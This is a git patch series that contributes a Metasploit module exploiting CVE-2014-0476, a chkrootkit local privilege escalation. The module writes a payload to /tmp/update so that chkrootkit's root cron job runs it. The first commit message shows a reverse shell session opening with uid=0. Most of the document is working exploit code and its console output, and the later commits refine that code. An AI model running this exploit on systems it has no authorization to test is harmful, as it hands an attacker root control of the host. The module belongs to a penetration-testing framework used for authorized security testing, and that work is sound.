From 3566b978c3f2e46e3047df251a3a32c4485e4ba3 Mon Sep 17 00:00:00 2001 From: jvoisin Date: Fri, 6 Nov 2015 20:50:29 +0100 Subject: [PATCH 1/5] Add a module for a chkrootkit-powered privsec This modules implements an exploit for CVE-2014-0476, to gain root thanks to chkrootkit. Its main issues is that you need to wait until chkrootkit is executed in a crontab (or manually), which can take 24h top with its default setup. How to reproduce: 1. Install a version < 0.50 of chkrootkit 2. Launch the local module 3. Wait until chkrootkit's crontab kicks in 4. You've got a root shell ``` msf > use exploit/linux/local/chkrootkit msf exploit(chkrootkit) > check [*] 192.168.1.25 - The target appears to be vulnerable. msf exploit(chkrootkit) > run [*] Exploit completed, but no session was created. [*] Started reverse handler on 192.168.1.11:9999 msf exploit(chkrootkit) > [+] Target is vulnerable. [!] Rooting depends of the crontab, this could take a while. [*] Payload written to /tmp/update [*] Waiting to chkrookit to be run be a cron tab... [*] Command shell session 6 opened (192.168.1.11:9999 -> 192.168.1.25:40006) at 2015-11-06 20:53:00 +0100 [+] Deleted /tmp/update msf exploit(chkrootkit) > sessions -i 6 [*] Starting interaction with 6... id uid=0(root) gid=0(root) groups=0(root) ``` --- modules/exploits/linux/local/chkrootkit.rb | 78 ++++++++++++++++++++++ 1 file changed, 78 insertions(+) create mode 100644 modules/exploits/linux/local/chkrootkit.rb diff --git a/modules/exploits/linux/local/chkrootkit.rb b/modules/exploits/linux/local/chkrootkit.rb new file mode 100644 index 0000000000..9354bddda0 --- /dev/null +++ b/modules/exploits/linux/local/chkrootkit.rb @@ -0,0 +1,78 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class Metasploit4 < Msf::Exploit::Local + # This could also be excellent, but since it requires + # up to one day to pop a shell, lets set it to Manual instead. + Rank = ManualRanking + + include Msf::Post::File + include Msf::Exploit::FileDropper + + include Msf::Exploit::Local::Linux + + def initialize(info={}) + super( update_info( info, { + 'Name' => 'Chkrootkit 0.49 Local Privilege Escalation', + 'Description' => %q{ + Chkrootkit before 0.50 will run as root any executable file named + /tmp/updater, allowing a trivial privsec. + + WfsDelay is set to 24h by default, since this is how often a chkrootkit + scan is scheduled by default. + }, + 'License' => MSF_LICENSE, + 'Author' => [ + 'Thomas Stangner', # original exploit + 'Julien (jvoisin) Voisin' # metasploit module + ], + 'Platform' => %w{ bsd linux unix solaris osx}, + 'SessionTypes' => [ 'shell', 'meterpreter' ], + 'References' => + [ + [ 'BID', '67813' ], + [ 'CVE', '2014-0476' ], + [ 'CWE', '20' ], + [ 'EDB', '33899' ], + [ 'OSVDB', '107710' ], + [ 'URL', 'http://seclists.org/oss-sec/2014/q2/430' ], + ], + 'DisclosureDate' => "Jun 28 2014", + 'Arch' => ARCH_CMD, + 'DefaultOptions' => { 'WfsDelay' => 60*3600*24 }, + 'Privileged' => true, + 'Targets' => + [ + [ 'Generic', {} ], + ], + 'Stance' => Msf::Exploit::Stance::Passive, + 'DefaultTarget' => 0,})) + end + + def check + res = cmd_exec('/usr/sbin/chkrootkit -V') + return Exploit::CheckCode::Appears if res && res =~ /chkrootkit version 0\.[^5]/ + return Exploit::CheckCode::Safe + end + + def exploit + if check == Exploit::CheckCode::Safe + fail_with(Failure::NotVulnerable, "Target is not vulnerable.") + else + print_good("Target is vulnerable.") + end + + print_warning('Rooting depends of the crontab, this could take a while.') + + write_file("/tmp/update", "#!/bin/sh\n#{payload.encoded}\n") + cmd_exec("chmod +x /tmp/update") + + print_status 'Payload written to /tmp/update' + print_status 'Waiting to chkrookit to be run be a cron tab...' + + register_file_for_cleanup('/tmp/update') + end +end + From 873994a154849804750fb5a3a83bf7c3dc238606 Mon Sep 17 00:00:00 2001 From: jvoisin Date: Fri, 13 Nov 2015 12:40:34 +0100 Subject: [PATCH 2/5] Skip the explicit return Thanks to kernelsmith for the feedback --- modules/exploits/linux/local/chkrootkit.rb | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/local/chkrootkit.rb b/modules/exploits/linux/local/chkrootkit.rb index 9354bddda0..50d4851514 100644 --- a/modules/exploits/linux/local/chkrootkit.rb +++ b/modules/exploits/linux/local/chkrootkit.rb @@ -53,8 +53,11 @@ class Metasploit4 < Msf::Exploit::Local def check res = cmd_exec('/usr/sbin/chkrootkit -V') - return Exploit::CheckCode::Appears if res && res =~ /chkrootkit version 0\.[^5]/ - return Exploit::CheckCode::Safe + if res && res =~ /chkrootkit version 0\.[^5]/ + Exploit::CheckCode::Appears + else + Exploit::CheckCode::Safe + end end def exploit From 70407a4f21856284a2dc2cd4c6bdd2ddaf066bd0 Mon Sep 17 00:00:00 2001 From: jvoisin Date: Mon, 16 Nov 2015 23:18:02 +0100 Subject: [PATCH 3/5] 3600 * 60 * 24 isn't one day --- modules/exploits/linux/local/chkrootkit.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/local/chkrootkit.rb b/modules/exploits/linux/local/chkrootkit.rb index 50d4851514..1d150f26b4 100644 --- a/modules/exploits/linux/local/chkrootkit.rb +++ b/modules/exploits/linux/local/chkrootkit.rb @@ -41,7 +41,7 @@ class Metasploit4 < Msf::Exploit::Local ], 'DisclosureDate' => "Jun 28 2014", 'Arch' => ARCH_CMD, - 'DefaultOptions' => { 'WfsDelay' => 60*3600*24 }, + 'DefaultOptions' => { 'WfsDelay' => 60*60*24 }, 'Privileged' => true, 'Targets' => [ From 44d477a13c4b8f07eff8e7d82aae306a5fb93793 Mon Sep 17 00:00:00 2001 From: jvoisin Date: Tue, 17 Nov 2015 13:26:50 +0100 Subject: [PATCH 4/5] Fix some rubocop warnings --- modules/exploits/linux/local/chkrootkit.rb | 26 +++++++++------------- 1 file changed, 11 insertions(+), 15 deletions(-) diff --git a/modules/exploits/linux/local/chkrootkit.rb b/modules/exploits/linux/local/chkrootkit.rb index 1d150f26b4..920ef932a4 100644 --- a/modules/exploits/linux/local/chkrootkit.rb +++ b/modules/exploits/linux/local/chkrootkit.rb @@ -13,22 +13,22 @@ class Metasploit4 < Msf::Exploit::Local include Msf::Exploit::Local::Linux - def initialize(info={}) - super( update_info( info, { + def initialize(info = {}) + super(update_info(info, { 'Name' => 'Chkrootkit 0.49 Local Privilege Escalation', - 'Description' => %q{ + 'Description' => %q( Chkrootkit before 0.50 will run as root any executable file named /tmp/updater, allowing a trivial privsec. WfsDelay is set to 24h by default, since this is how often a chkrootkit scan is scheduled by default. - }, + ), 'License' => MSF_LICENSE, 'Author' => [ 'Thomas Stangner', # original exploit 'Julien (jvoisin) Voisin' # metasploit module ], - 'Platform' => %w{ bsd linux unix solaris osx}, + 'Platform' => %w( bsd linux unix solaris osx), 'SessionTypes' => [ 'shell', 'meterpreter' ], 'References' => [ @@ -37,26 +37,23 @@ class Metasploit4 < Msf::Exploit::Local [ 'CWE', '20' ], [ 'EDB', '33899' ], [ 'OSVDB', '107710' ], - [ 'URL', 'http://seclists.org/oss-sec/2014/q2/430' ], + [ 'URL', 'http://seclists.org/oss-sec/2014/q2/430' ] ], 'DisclosureDate' => "Jun 28 2014", 'Arch' => ARCH_CMD, - 'DefaultOptions' => { 'WfsDelay' => 60*60*24 }, + 'DefaultOptions' => { 'WfsDelay' => 60 * 60 * 24 }, 'Privileged' => true, - 'Targets' => - [ - [ 'Generic', {} ], - ], + 'Targets' => [[ 'Generic', {} ]], 'Stance' => Msf::Exploit::Stance::Passive, - 'DefaultTarget' => 0,})) + 'DefaultTarget' => 0 })) end def check res = cmd_exec('/usr/sbin/chkrootkit -V') if res && res =~ /chkrootkit version 0\.[^5]/ - Exploit::CheckCode::Appears + Exploit::CheckCode::Appears else - Exploit::CheckCode::Safe + Exploit::CheckCode::Safe end end @@ -78,4 +75,3 @@ class Metasploit4 < Msf::Exploit::Local register_file_for_cleanup('/tmp/update') end end - From 657e50bb867120f5650ca85a985c9f541550f262 Mon Sep 17 00:00:00 2001 From: William Vu Date: Wed, 18 Nov 2015 10:35:11 -0600 Subject: [PATCH 5/5] Clean up module --- modules/exploits/linux/local/chkrootkit.rb | 77 ---------------------- modules/exploits/unix/local/chkrootkit.rb | 75 +++++++++++++++++++++ 2 files changed, 75 insertions(+), 77 deletions(-) delete mode 100644 modules/exploits/linux/local/chkrootkit.rb create mode 100644 modules/exploits/unix/local/chkrootkit.rb diff --git a/modules/exploits/linux/local/chkrootkit.rb b/modules/exploits/linux/local/chkrootkit.rb deleted file mode 100644 index 920ef932a4..0000000000 --- a/modules/exploits/linux/local/chkrootkit.rb +++ /dev/null @@ -1,77 +0,0 @@ -## -# This module requires Metasploit: http://metasploit.com/download -# Current source: https://github.com/rapid7/metasploit-framework -## - -class Metasploit4 < Msf::Exploit::Local - # This could also be excellent, but since it requires - # up to one day to pop a shell, lets set it to Manual instead. - Rank = ManualRanking - - include Msf::Post::File - include Msf::Exploit::FileDropper - - include Msf::Exploit::Local::Linux - - def initialize(info = {}) - super(update_info(info, { - 'Name' => 'Chkrootkit 0.49 Local Privilege Escalation', - 'Description' => %q( - Chkrootkit before 0.50 will run as root any executable file named - /tmp/updater, allowing a trivial privsec. - - WfsDelay is set to 24h by default, since this is how often a chkrootkit - scan is scheduled by default. - ), - 'License' => MSF_LICENSE, - 'Author' => [ - 'Thomas Stangner', # original exploit - 'Julien (jvoisin) Voisin' # metasploit module - ], - 'Platform' => %w( bsd linux unix solaris osx), - 'SessionTypes' => [ 'shell', 'meterpreter' ], - 'References' => - [ - [ 'BID', '67813' ], - [ 'CVE', '2014-0476' ], - [ 'CWE', '20' ], - [ 'EDB', '33899' ], - [ 'OSVDB', '107710' ], - [ 'URL', 'http://seclists.org/oss-sec/2014/q2/430' ] - ], - 'DisclosureDate' => "Jun 28 2014", - 'Arch' => ARCH_CMD, - 'DefaultOptions' => { 'WfsDelay' => 60 * 60 * 24 }, - 'Privileged' => true, - 'Targets' => [[ 'Generic', {} ]], - 'Stance' => Msf::Exploit::Stance::Passive, - 'DefaultTarget' => 0 })) - end - - def check - res = cmd_exec('/usr/sbin/chkrootkit -V') - if res && res =~ /chkrootkit version 0\.[^5]/ - Exploit::CheckCode::Appears - else - Exploit::CheckCode::Safe - end - end - - def exploit - if check == Exploit::CheckCode::Safe - fail_with(Failure::NotVulnerable, "Target is not vulnerable.") - else - print_good("Target is vulnerable.") - end - - print_warning('Rooting depends of the crontab, this could take a while.') - - write_file("/tmp/update", "#!/bin/sh\n#{payload.encoded}\n") - cmd_exec("chmod +x /tmp/update") - - print_status 'Payload written to /tmp/update' - print_status 'Waiting to chkrookit to be run be a cron tab...' - - register_file_for_cleanup('/tmp/update') - end -end diff --git a/modules/exploits/unix/local/chkrootkit.rb b/modules/exploits/unix/local/chkrootkit.rb new file mode 100644 index 0000000000..1c7b5c64a6 --- /dev/null +++ b/modules/exploits/unix/local/chkrootkit.rb @@ -0,0 +1,75 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +class Metasploit4 < Msf::Exploit::Local + + # This could also be Excellent, but since it requires + # up to one day to pop a shell, let's set it to Manual instead. + Rank = ManualRanking + + include Msf::Post::File + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Chkrootkit Local Privilege Escalation', + 'Description' => %q{ + Chkrootkit before 0.50 will run any executable file named + /tmp/update as root, allowing a trivial privsec. + + WfsDelay is set to 24h, since this is how often a chkrootkit + scan is scheduled by default. + }, + 'Author' => [ + 'Thomas Stangner', # Original exploit + 'Julien "jvoisin" Voisin' # Metasploit module + ], + 'References' => [ + ['CVE', '2014-0476'], + ['OSVDB', '107710'], + ['EDB', '33899'], + ['BID', '67813'], + ['CWE', '20'], + ['URL', 'http://seclists.org/oss-sec/2014/q2/430'] + ], + 'DisclosureDate' => 'Jun 04 2014', + 'License' => MSF_LICENSE, + 'Platform' => 'unix', + 'Arch' => ARCH_CMD, + 'SessionTypes' => ['shell', 'meterpreter'], + 'Privileged' => true, + 'Stance' => Msf::Exploit::Stance::Passive, + 'Targets' => [['Automatic', {}]], + 'DefaultTarget' => 0, + 'DefaultOptions' => {'WfsDelay' => 60 * 60 * 24} # 24h + )) + + register_options([ + OptString.new('CHKROOTKIT', [true, 'Path to chkrootkit', '/usr/sbin/chkrootkit']) + ]) + end + + def check + version = cmd_exec("#{datastore['CHKROOTKIT']} -V 2>&1") + + if version =~ /chkrootkit version 0\.[1-4]/ + Exploit::CheckCode::Appears + else + Exploit::CheckCode::Safe + end + end + + def exploit + print_warning('Rooting depends on the crontab (this could take a while)') + + write_file('/tmp/update', "#!/bin/sh\n(#{payload.encoded}) &\n") + cmd_exec('chmod +x /tmp/update') + register_file_for_cleanup('/tmp/update') + + print_status('Payload written to /tmp/update') + print_status('Waiting for chkrootkit to run via cron...') + end + +end